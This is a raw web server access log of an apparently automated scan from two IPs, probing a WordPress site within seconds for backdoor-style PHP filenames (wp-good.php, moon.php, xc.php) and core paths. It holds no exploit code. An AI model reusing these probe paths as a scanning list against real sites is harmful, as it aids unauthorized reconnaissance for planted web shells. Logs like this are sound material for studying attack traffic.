193.37.32.61 - - [25/Nov/2025:19:07:10 +0800] "GET /cache.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
193.37.32.61 - - [25/Nov/2025:19:07:10 +0800] "GET /wp-good.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
193.37.32.61 - - [25/Nov/2025:19:07:11 +0800] "GET /wp-includes/ID3/ HTTP/1.1" 403 146 "-" "Go-http-client/1.1"
193.37.32.61 - - [25/Nov/2025:19:07:12 +0800] "GET /randkeyword.PhP7 HTTP/1.1" 404 8989 "-" "Go-http-client/1.1"
193.37.32.61 - - [25/Nov/2025:19:07:12 +0800] "GET /ioxi002.PhP7 HTTP/1.1" 404 8989 "-" "Go-http-client/1.1"
193.37.32.61 - - [25/Nov/2025:19:07:13 +0800] "GET /wp-admin/js/about.php7 HTTP/1.1" 404 8989 "-" "Go-http-client/1.1"
193.37.32.61 - - [25/Nov/2025:19:07:14 +0800] "GET /akcc.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
193.37.32.61 - - [25/Nov/2025:19:07:14 +0800] "GET /function/function.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
193.37.32.102 - - [25/Nov/2025:19:07:14 +0800] "GET /wp-admin/includes/ HTTP/1.1" 403 146 "-" "Go-http-client/1.1"
193.37.32.102 - - [25/Nov/2025:19:07:15 +0800] "GET /1.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
193.37.32.102 - - [25/Nov/2025:19:07:15 +0800] "GET /autoload_classmap.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
193.37.32.102 - - [25/Nov/2025:19:07:15 +0800] "GET /wp-includes/fonts/ HTTP/1.1" 403 146 "-" "Go-http-client/1.1"
193.37.32.102 - - [25/Nov/2025:19:07:16 +0800] "GET /xmlrpc.php HTTP/1.1" 405 53 "-" "Go-http-client/1.1"
193.37.32.102 - - [25/Nov/2025:19:07:17 +0800] "GET /wp- HTTP/1.1" 404 8989 "-" "Go-http-client/1.1"
193.37.32.102 - - [25/Nov/2025:19:07:18 +0800] "GET /wp-error.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
193.37.32.102 - - [25/Nov/2025:19:07:18 +0800] "GET /file2.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
193.37.32.102 - - [25/Nov/2025:19:07:19 +0800] "GET /adminfuns.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
193.37.32.102 - - [25/Nov/2025:19:07:19 +0800] "GET /wp-content/plugins/ HTTP/1.1" 200 31 "-" "Go-http-client/1.1"
193.37.32.102 - - [25/Nov/2025:19:07:19 +0800] "GET /xc.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
193.37.32.102 - - [25/Nov/2025:19:07:20 +0800] "GET /wp-admin/classwithtostring.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
193.37.32.102 - - [25/Nov/2025:19:07:20 +0800] "GET /moon.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
193.37.32.102 - - [25/Nov/2025:19:07:20 +0800] "GET /wp-includes/IXR/ HTTP/1.1" 403 146 "-" "Go-http-client/1.1"
193.37.32.102 - - [25/Nov/2025:19:07:21 +0800] "GET /wp-trackback.php HTTP/1.1" 404 144 "-" "Go-http-client/1.1"
193.37.32.102 - - [25/Nov/2025:19:07:21 +0800] "GET /wp-includes/rest-api/ HTTP/1.1" 403 146 "-" "Go-http-client/1.1"
193.37.32.102 - - [25/Nov/2025:19:07:22 +0800] "GET /load.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
193.37.32.102 - - [25/Nov/2025:19:07:23 +0800] "GET /wp-admin/edit.php HTTP/1.1" 302 5 "-" "Go-http-client/1.1"
